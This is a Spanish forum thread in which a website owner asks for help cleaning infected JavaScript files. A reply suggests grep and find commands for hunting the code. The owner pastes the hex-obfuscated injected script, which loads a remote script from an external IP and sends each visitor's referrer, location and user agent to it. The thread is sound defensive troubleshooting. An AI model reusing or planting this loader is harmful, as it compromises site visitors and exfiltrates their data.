Cita:
Iniciado por AlvaroG Pues con acceso ssh deberías poder encontrar las cadenas de texto que están en esos archivos (con grep).
grep -R lo_que_buscas *.js
Si el código malicioso no está ofuscado, quizás una búsqueda por el dominio "psilondesig.osa.pl" te de resultados. Si está ofuscado, aún podrías tener alguna oportunidad buscando llamadas a "eval", ya que usualmente no es usado por código "buenicioso" :D
find /carpeta/ -name "*.js" -exec grep eval {} +
debería devolverte todas las líneas conteniendo "eval" en todos los archivos javascript dentro de /carpeta
Saludos y suerte!
Hey! muchas gracias por la respuesta.... Luego intentaré buscarlo a ver que puedo hacer así!
El caso es que sigo borrando el contenido de los archivos *.js de forma manual....
El código que aparece dentro de cada *.js es el siguiente:
Código:
var _0x80d0=["\x64\x67\x6C\x6C\x68\x67\x75\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x32\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0x80d0[1]](_0x80d0[0]);if(!element){dawdafraawegdhdhd=document[_0x80d0[2]];gfjlhggfdghdd=escape(document[_0x80d0[3]]);hgfjkgkffgsdgd=escape(navigator[_0x80d0[4]]);var js=document[_0x80d0[6]](_0x80d0[5]);js[_0x80d0[7]]=_0x80d0[0];js[_0x80d0[8]]=_0x80d0[9]+gfjlhggfdghdd+_0x80d0[10]+dawdafraawegdhdhd+_0x80d0[11]+hgfjkgkffgsdgd;var head=document[_0x80d0[13]](_0x80d0[12])[0];head[_0x80d0[14]](js);} ;
A alguien le a sucedido algo por el estilo?
Gracias a todos!